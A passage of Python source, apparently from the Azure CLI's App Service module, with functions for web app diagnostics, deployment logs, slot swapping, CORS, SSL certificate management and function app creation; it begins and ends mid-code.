leading '@' xmltodict put in for attributes new[key.lstrip('@')] = profile[key] converted.append(new) return converted cmd.cli_ctx.invocation.data['output'] = 'tsv' return full_xml def enable_cd(cmd, resource_group_name, name, enable, slot=None): settings = [] settings.append("DOCKER_ENABLE_CI=" + enable) update_app_settings(cmd, resource_group_name, name, settings, slot) return show_container_cd_url(cmd, resource_group_name, name, slot) def show_container_cd_url(cmd, resource_group_name, name, slot=None): settings = get_app_settings(cmd, resource_group_name, name, slot) docker_enabled = False for setting in settings: if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true': docker_enabled = True break cd_settings = {} cd_settings['DOCKER_ENABLE_CI'] = docker_enabled if docker_enabled: credentials = list_publishing_credentials(cmd, resource_group_name, name, slot) if credentials: cd_url = credentials.scm_uri + '/docker/hook' cd_settings['CI_CD_URL'] = cd_url else: cd_settings['CI_CD_URL'] = '' return cd_settings def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False): url = _get_url(cmd, resource_group_name, name, slot) open_page_in_browser(url) if logs: get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot) def _get_url(cmd, resource_group_name, name, slot=None): SslState = cmd.get_models('SslState') site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) if not site: raise CLIError("'{}' app doesn't exist".format(name)) url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned ssl_host = next((h for h in site.host_name_ssl_states if h.ssl_state != SslState.disabled), None) return ('https' if ssl_host else 'http') + '://' + url # TODO: expose new blob suport def config_diagnostics(cmd, resource_group_name, name, level=None, application_logging=None, web_server_logging=None, docker_container_logging=None, detailed_error_messages=None, failed_request_tracing=None, slot=None): from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig, AzureBlobStorageApplicationLogsConfig, SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig, EnabledConfig) client = web_client_factory(cmd.cli_ctx) # TODO: ensure we call get_site only once site = client.web_apps.get(resource_group_name, name) if not site: raise CLIError("'{}' app doesn't exist".format(name)) location = site.location application_logs = None if application_logging: fs_log = None blob_log = None level = level if application_logging != 'off' else False level = True if level is None else level if application_logging in ['filesystem', 'off']: fs_log = FileSystemApplicationLogsConfig(level=level) if application_logging in ['azureblobstorage', 'off']: blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3, sas_url=None) application_logs = ApplicationLogsConfig(file_system=fs_log, azure_blob_storage=blob_log) http_logs = None server_logging_option = web_server_logging or docker_container_logging if server_logging_option: # TODO: az blob storage log config currently not in use, will be impelemented later. # Tracked as Issue: #4764 on Github filesystem_log_config = None turned_on = server_logging_option != 'off' if server_logging_option in ['filesystem', 'off']: # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3, enabled=turned_on) http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None) detailed_error_messages_logs = (None if detailed_error_messages is None else EnabledConfig(enabled=detailed_error_messages)) failed_request_tracing_logs = (None if failed_request_tracing is None else EnabledConfig(enabled=failed_request_tracing)) site_log_config = SiteLogsConfig(location=location, application_logs=application_logs, http_logs=http_logs, failed_requests_tracing=failed_request_tracing_logs, detailed_error_messages=detailed_error_messages_logs) return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config', slot, site_log_config) def show_diagnostic_settings(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot) def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None): import urllib3 import requests scm_url = _get_scm_url(cmd, resource_group, name, slot) username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot) headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password)) deployment_log_url = '' if deployment_id: deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id) else: deployments_url = '{}/api/deployments/'.format(scm_url) response = requests.get(deployments_url, headers=headers) if response.status_code != 200: raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format( deployments_url, response.status_code, response.reason)) sorted_logs = sorted( response.json(), key=lambda x: x['start_time'], reverse=True ) if sorted_logs and sorted_logs[0]: deployment_log_url = sorted_logs[0].get('log_url', '') if deployment_log_url: response = requests.get(deployment_log_url, headers=headers) if response.status_code != 200: raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format( deployment_log_url, response.status_code, response.reason)) return response.json() return [] def list_deployment_logs(cmd, resource_group, name, slot=None): scm_url = _get_scm_url(cmd, resource_group, name, slot) deployment_log_url = '{}/api/deployments/'.format(scm_url) username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot) import urllib3 headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password)) import requests response = requests.get(deployment_log_url, headers=headers) if response.status_code != 200: raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format( scm_url, response.status_code, response.reason)) return response.json() or [] def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None): client = web_client_factory(cmd.cli_ctx) site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot) site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production') return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config) def list_slots(cmd, resource_group_name, webapp): client = web_client_factory(cmd.cli_ctx) slots = list(client.web_apps.list_slots(resource_group_name, webapp)) for slot in slots: slot.name = slot.name.split('/')[-1] setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name']) del slot.server_farm_id return slots def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'): client = web_client_factory(cmd.cli_ctx) # Default isPreserveVnet to 'True' if preserve_vnet is 'None' isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true' # converstion from string to Boolean isPreserveVnet = bool(isPreserveVnet == 'true') CsmSlotEntity = cmd.get_models('CsmSlotEntity') slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet) if action == 'swap': poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity) return poller if action == 'preview': if slot is None: result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity) else: result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity) return result # we will reset both source slot and target slot if target_slot is None: client.web_apps.reset_production_slot_config(resource_group_name, webapp) else: client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot) return None def delete_slot(cmd, resource_group_name, webapp, slot): client = web_client_factory(cmd.cli_ctx) # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc... client.web_apps.delete_slot(resource_group_name, webapp, slot) def set_traffic_routing(cmd, resource_group_name, name, distribution): RampUpRule = cmd.get_models('RampUpRule') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, name) if not site: raise CLIError("'{}' app doesn't exist".format(name)) configs = get_site_configs(cmd, resource_group_name, name) host_name_split = site.default_host_name.split('.', 1) host_name_suffix = '.' + host_name_split[1] host_name_val = host_name_split[0] configs.experiments.ramp_up_rules = [] for r in distribution: slot, percentage = r.split('=') action_host_name_slot = host_name_val + "-" + slot configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix, reroute_percentage=float(percentage), name=slot)) _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs) return configs.experiments.ramp_up_rules def show_traffic_routing(cmd, resource_group_name, name): configs = get_site_configs(cmd, resource_group_name, name) return configs.experiments.ramp_up_rules def clear_traffic_routing(cmd, resource_group_name, name): set_traffic_routing(cmd, resource_group_name, name, []) def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None): from azure.mgmt.web.models import CorsSettings configs = get_site_configs(cmd, resource_group_name, name, slot) if not configs.cors: configs.cors = CorsSettings() configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs) return result.cors def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None): configs = get_site_configs(cmd, resource_group_name, name, slot) if configs.cors: if allowed_origins: configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins] else: configs.cors.allowed_origins = [] configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs) return configs.cors def show_cors(cmd, resource_group_name, name, slot=None): configs = get_site_configs(cmd, resource_group_name, name, slot) return configs.cors def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None): scm_url = _get_scm_url(cmd, resource_group_name, name, slot) streaming_url = scm_url + '/logstream' if provider: streaming_url += ('/' + provider.lstrip('/')) user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) t = threading.Thread(target=_get_log, args=(streaming_url, user, password)) t.daemon = True t.start() while True: time.sleep(100) # so that ctrl+c can stop the command def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None): scm_url = _get_scm_url(cmd, resource_group_name, name, slot) url = scm_url.rstrip('/') + '/dump' user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) _get_log(url, user_name, password, log_file) logger.warning('Downloaded logs to %s', log_file) def _get_site_credential(cli_ctx, resource_group_name, name, slot=None): creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot) creds = creds.result() return (creds.publishing_user_name, creds.publishing_password) def _get_log(url, user_name, password, log_file=None): import urllib3 try: import urllib3.contrib.pyopenssl urllib3.contrib.pyopenssl.inject_into_urllib3() except ImportError: pass http = get_pool_manager(url) headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password)) r = http.request( 'GET', url, headers=headers, preload_content=False ) if r.status != 200: raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format( url, r.status, r.reason)) if log_file: # download logs with open(log_file, 'wb') as f: while True: data = r.read(1024) if not data: break f.write(data) else: # streaming std_encoding = sys.stdout.encoding for chunk in r.stream(): if chunk: # Extra encode() and decode for stdout which does not surpport 'utf-8' logger.warning(chunk.decode(encoding='utf-8', errors='replace') .encode(std_encoding, errors='replace') .decode(std_encoding, errors='replace') .rstrip('\n\r')) # each line of log has CRLF. r.release_conn() def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None): Certificate = cmd.get_models('Certificate') client = web_client_factory(cmd.cli_ctx) webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) cert_file = open(certificate_file, 'rb') cert_contents = cert_file.read() hosting_environment_profile_param = (webapp.hosting_environment_profile.name if webapp.hosting_environment_profile else '') thumb_print = _get_cert(certificate_password, certificate_file) cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param, webapp.location, resource_group_name) cert = Certificate(password=certificate_password, pfx_blob=cert_contents, location=webapp.location, server_farm_id=webapp.server_farm_id) return client.certificates.create_or_update(resource_group_name, cert_name, cert) def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name): return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name) def _get_cert(certificate_password, certificate_file): ''' Decrypts the .pfx file ''' p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password) cert = p12.get_certificate() digest_algorithm = 'sha1' thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '') return thumbprint def list_ssl_certs(cmd, resource_group_name): client = web_client_factory(cmd.cli_ctx) return client.certificates.list_by_resource_group(resource_group_name) def show_ssl_cert(cmd, resource_group_name, certificate_name): client = web_client_factory(cmd.cli_ctx) return client.certificates.get(resource_group_name, certificate_name) def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint): client = web_client_factory(cmd.cli_ctx) webapp_certs = client.certificates.list_by_resource_group(resource_group_name) for webapp_cert in webapp_certs: if webapp_cert.thumbprint == certificate_thumbprint: return client.certificates.delete(resource_group_name, webapp_cert.name) raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint)) def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name): Certificate = cmd.get_models('Certificate') client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, name) if not webapp: raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name)) server_farm_id = webapp.server_farm_id location = webapp.location kv_id = None if not is_valid_resource_id(key_vault): kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT) key_vaults = kv_client.vaults.list_by_subscription() for kv in key_vaults: if key_vault == kv.name: kv_id = kv.id break else: kv_id = key_vault if kv_id is None: kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \ 'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \ '\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \ '--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \ 'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name) logger.warning(kv_msg) return kv_id_parts = parse_resource_id(kv_id) kv_name = kv_id_parts['name'] kv_resource_group_name = kv_id_parts['resource_group'] kv_subscription = kv_id_parts['subscription'] # If in the public cloud, check if certificate is an app service certificate, in the same or a diferent # subscription kv_secret_name = None cloud_type = cmd.cli_ctx.cloud.name from azure.cli.core.commands.client_factory import get_subscription_id subscription_id = get_subscription_id(cmd.cli_ctx) if cloud_type.lower() == PUBLIC_CLOUD.lower(): if kv_subscription.lower() != subscription_id.lower(): diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE, subscription_id=kv_subscription) ascs = diff_subscription_client.app_service_certificate_orders.list() else: ascs = client.app_service_certificate_orders.list() kv_secret_name = None for asc in ascs: if asc.name == key_vault_certificate_name: kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name # if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates if not kv_secret_name: kv_secret_name = key_vault_certificate_name cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name) lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html' lnk_msg = 'Find more details here: {}'.format(lnk) if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription): logger.warning('Unable to verify Key Vault permissions.') logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission') logger.warning(lnk_msg) kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='', key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id) return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name, certificate_envelope=kv_cert_def) def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None): Certificate = cmd.get_models('Certificate') hostname = hostname.lower() client = web_client_factory(cmd.cli_ctx) webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) if not webapp: slot_text = "Deployment slot {} in ".format(slot) if slot else '' raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name)) parsed_plan_id = parse_resource_id(webapp.server_farm_id) plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name']) if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED': raise CLIError('Managed Certificate is not supported on Free and Shared tier.') if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot): slot_text = " --slot {}".format(slot) if slot else "" raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. " "Use 'az webapp config hostname add --resource-group {2} " "--webapp-name {1}{3} --hostname {0}' " "to register the hostname.".format(hostname, name, resource_group_name, slot_text)) server_farm_id = webapp.server_farm_id location = webapp.location easy_cert_def = Certificate(location=location, canonical_name=hostname, server_farm_id=server_farm_id, password='') # TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling try: return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name, certificate_envelope=easy_cert_def) except Exception as ex: poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None if ex.response.status_code == 202 and poll_url: r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url) poll_timeout = time.time() + 60 * 2 # 2 minute timeout while r.status_code != 200 and time.time() < poll_timeout: time.sleep(5) r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url) if r.status_code == 200: try: return r.json() except ValueError: return r.text logger.warning("Managed Certificate creation in progress. Please use the command " "'az webapp config ssl show -g %s --certificate-name %s' " " to view your certificate once it is created", resource_group_name, hostname) return raise CLIError(ex) def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription): from azure.cli.command_modules.role._client_factory import _graph_client_factory from azure.graphrbac.models import GraphErrorException from azure.cli.core.commands.client_factory import get_subscription_id subscription = get_subscription_id(cmd.cli_ctx) # Cannot check if key vault is in another subscription if subscription != key_vault_subscription: return False kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT) vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name) # Check for Microsoft.Azure.WebSites app registration AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd' AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714' graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals for policy in vault.properties.access_policies: try: sp = graph_sp_client.get(policy.object_id) if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID: for perm in policy.permissions.secrets: if perm == "Get": return True except GraphErrorException: pass # Lookup will fail for non service principals (users, groups, etc.) return False def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp, host_name, ssl_state, thumbprint, slot=None): Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState') updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name, ssl_state=ssl_state, thumbprint=thumbprint, to_update=True)], location=webapp.location, tags=webapp.tags) return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update', slot, updated_webapp) def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None): client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, name) if not webapp: raise ResourceNotFoundError("'{}' app doesn't exist".format(name)) cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group'] webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name) found_cert = None for webapp_cert in webapp_certs: if webapp_cert.thumbprint == certificate_thumbprint: found_cert = webapp_cert if not found_cert: webapp_certs = client.certificates.list_by_resource_group(resource_group_name) for webapp_cert in webapp_certs: if webapp_cert.thumbprint == certificate_thumbprint: found_cert = webapp_cert if found_cert: if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'): return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp, found_cert.host_names[0], ssl_type, certificate_thumbprint, slot) query_result = list_hostnames(cmd, resource_group_name, name, slot) hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result] to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp) for h in to_update: _update_host_name_ssl_state(cmd, resource_group_name, name, webapp, h, ssl_type, certificate_thumbprint, slot) return show_webapp(cmd, resource_group_name, name, slot) raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint)) def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None): SslState = cmd.get_models('SslState') return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot) def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None): SslState = cmd.get_models('SslState') return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, SslState.disabled, slot) def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp): # the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc matched = set() for hostname in hostnames_from_cert: if hostname.startswith('*'): for h in hostnames_in_webapp: if hostname[hostname.find('.'):] == h[h.find('.'):]: matched.add(h) elif hostname in hostnames_in_webapp: matched.add(hostname) return matched # help class handles runtime stack in format like 'node|6.1', 'php|5.5' class _StackRuntimeHelper: def __init__(self, cmd, client, linux=False): self._cmd = cmd self._client = client self._linux = linux self._stacks = [] @staticmethod def remove_delimiters(runtime): import re # delimiters allowed: '|', ':' if '|' in runtime: runtime = re.split('[|]', runtime) elif ':' in runtime: runtime = re.split('[:]', runtime) else: runtime = [runtime] return '|'.join(filter(None, runtime)) def resolve(self, display_name): self._load_stacks_hardcoded() return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()), None) @property def stacks(self): self._load_stacks_hardcoded() return self._stacks @staticmethod def update_site_config(stack, site_config, cmd=None): for k, v in stack['configs'].items(): setattr(site_config, k, v) return site_config @staticmethod def update_site_appsettings(cmd, stack, site_config): NameValuePair = cmd.get_models('NameValuePair') if site_config.app_settings is None: site_config.app_settings = [] for k, v in stack['configs'].items(): already_in_appsettings = False for app_setting in site_config.app_settings: if app_setting.name == k: already_in_appsettings = True app_setting.value = v if not already_in_appsettings: site_config.app_settings.append(NameValuePair(name=k, value=v)) return site_config def _load_stacks_hardcoded(self): if self._stacks: return result = [] if self._linux: result = get_file_json(RUNTIME_STACKS)['linux'] for r in result: r['setter'] = _StackRuntimeHelper.update_site_config else: # Windows stacks result = get_file_json(RUNTIME_STACKS)['windows'] for r in result: r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in r['displayName'] else _StackRuntimeHelper.update_site_config) self._stacks = result # Currently using hardcoded values instead of this function. This function calls the stacks API; # Stacks API is updated with Antares deployments, # which are infrequent and don't line up with stacks EOL schedule. def _load_stacks(self): if self._stacks: return os_type = ('Linux' if self._linux else 'Windows') raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True) bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access json_value = bytes_value.decode('utf8') json_stacks = json.loads(json_value) stacks = json_stacks['value'] result = [] if self._linux: for properties in [(s['properties']) for s in stacks]: for major in properties['majorVersions']: default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']), None) result.append({ 'displayName': (default_minor['runtimeVersion'] if default_minor else major['runtimeVersion']) }) else: # Windows stacks config_mappings = { 'node': 'WEBSITE_NODE_DEFAULT_VERSION', 'python': 'python_version', 'php': 'php_version', 'aspnet': 'net_framework_version' } # get all stack version except 'java' for stack in stacks: if stack['name'] not in config_mappings: continue name, properties = stack['name'], stack['properties'] for major in properties['majorVersions']: default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']), None) result.append({ 'displayName': name + '|' + major['displayVersion'], 'configs': { config_mappings[name]: (default_minor['runtimeVersion'] if default_minor else major['runtimeVersion']) } }) # deal with java, which pairs with java container version java_stack = next((s for s in stacks if s['name'] == 'java')) java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers')) for java_version in java_stack['properties']['majorVersions']: for fx in java_container_stack['properties']['frameworks']: for fx_version in fx['majorVersions']: result.append({ 'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'], fx['display'], fx_version['displayVersion']), 'configs': { 'java_version': java_version['runtimeVersion'], 'java_container': fx['name'], 'java_container_version': fx_version['runtimeVersion'] } }) for r in result: r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in r['displayName'] else _StackRuntimeHelper.update_site_config) self._stacks = result def get_app_insights_key(cli_ctx, resource_group, name): appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient) appinsights = appinsights_client.components.get(resource_group, name) if appinsights is None or appinsights.instrumentation_key is None: raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group)) return appinsights.instrumentation_key def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None, max_burst=None, location=None, tags=None): SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan') sku = _normalize_sku(sku) tier = get_sku_name(sku) if max_burst is not None: if tier.lower() != "elasticpremium": raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans") max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20) if number_of_workers is not None: number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count', number_of_workers, min_val=0, max_val=20) client = web_client_factory(cmd.cli_ctx) if location is None: location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name) sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers) plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def, reserved=(is_linux or None), maximum_elastic_worker_count=max_burst, hyper_v=None, name=name) return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def) def is_plan_consumption(cmd, plan_info): SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan') if isinstance(plan_info, AppServicePlan): if isinstance(plan_info.sku, SkuDescription): return plan_info.sku.tier.lower() == 'dynamic' return False def is_plan_elastic_premium(cmd, plan_info): SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan') if isinstance(plan_info, AppServicePlan): if isinstance(plan_info.sku, SkuDescription): return plan_info.sku.tier == 'ElasticPremium' return False def validate_and_convert_to_int(flag, val): try: return int(val) except ValueError: raise CLIError("Usage error: {} is expected to have an int value.".format(flag)) def validate_range_of_int_flag(flag_name, value, min_val, max_val): value = validate_and_convert_to_int(flag_name, value) if min_val > value or value > max_val: raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val, max_val)) return value def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None, os_type=None, functions_version=None, runtime=None, runtime_version=None, consumption_plan_location=None, app_insights=None, app_insights_key=None, disable_app_insights=None, deployment_source_url=None, deployment_source_branch='master', deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None, deployment_container_image_name=None, tags=None, assign_identities=None, role='Contributor', scope=None, vnet=None, subnet=None): # pylint: disable=too-many-statements, too-many-branches if functions_version is None: logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will " "be required. To create a 3.x function you would pass in the flag `--functions-version 3`") functions_version = '3' if deployment_source_url and deployment_local_git: raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git') if bool(plan) == bool(consumption_plan_location): raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION") from azure.mgmt.web.models import Site SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair') docker_registry_server_url = parse_docker_image_name(deployment_container_image_name) disable_app_insights = (disable_app_insights == "true") site_config = SiteConfig(app_settings=[]) client = web_client_factory(cmd.cli_ctx) if vnet or subnet: if plan: if is_valid_resource_id(plan): parse_result = parse_resource_id(plan) plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name']) else: plan_info = client.app_service_plans.get(resource_group_name, plan) webapp_location = plan_info.location else: webapp_location = consumption_plan_location subnet_info = _get_subnet_info(cmd=cmd, resource_group_name=resource_group_name, subnet=subnet, vnet=vnet) _validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location, subnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"]) _vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"], vnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"], subnet_name=subnet_info["subnet_name"]) site_config.vnet_route_all_enabled = True subnet_resource_id = subnet_info["subnet_resource_id"] else: subnet_resource_id = None functionapp_def = Site(location=None, site_config=site_config, tags=tags, virtual_network_subnet_id=subnet_resource_id) KEYS = FUNCTIONS_STACKS_API_KEYS() plan_info = None if runtime is not None: runtime = runtime.lower() if consumption_plan_location: locations = list_consumption_locations(cmd) location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None) if location is None: raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations") functionapp_def.location = consumption_plan_location functionapp_def.kind = 'functionapp' # if os_type is None, the os type is windows is_linux = os_type and os_type.lower() == 'linux' else: # apps with SKU based plan if is_valid_resource_id(plan): parse_result = parse_resource_id(plan) plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name']) else: plan_info = client.app_service_plans.get(resource_group_name, plan) if not plan_info: raise CLIError("The plan '{}' doesn't exist".format(plan)) location = plan_info.location is_linux = plan_info.reserved functionapp_def.server_farm_id = plan functionapp_def.location = location if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS: raise CLIError("2.x functions are not supported in this region. To create a 3.x function, " "pass in the flag '--functions-version 3'") if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name): raise CLIError( "usage error: --runtime RUNTIME required for linux functions apps without custom image.") runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux) if runtime is None and runtime_version is not None: raise CLIError('Must specify --runtime to use --runtime-version') # get the matching runtime stack object runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet') if not runtime_json: # no matching runtime for os os_string = "linux" if is_linux else "windows" supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json)) raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}." .format(os_string, ', '.join(supported_runtimes))) runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux) if not runtime_version_json: supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION], _get_supported_runtime_versions_functionapp(runtime_json, functions_version))) if 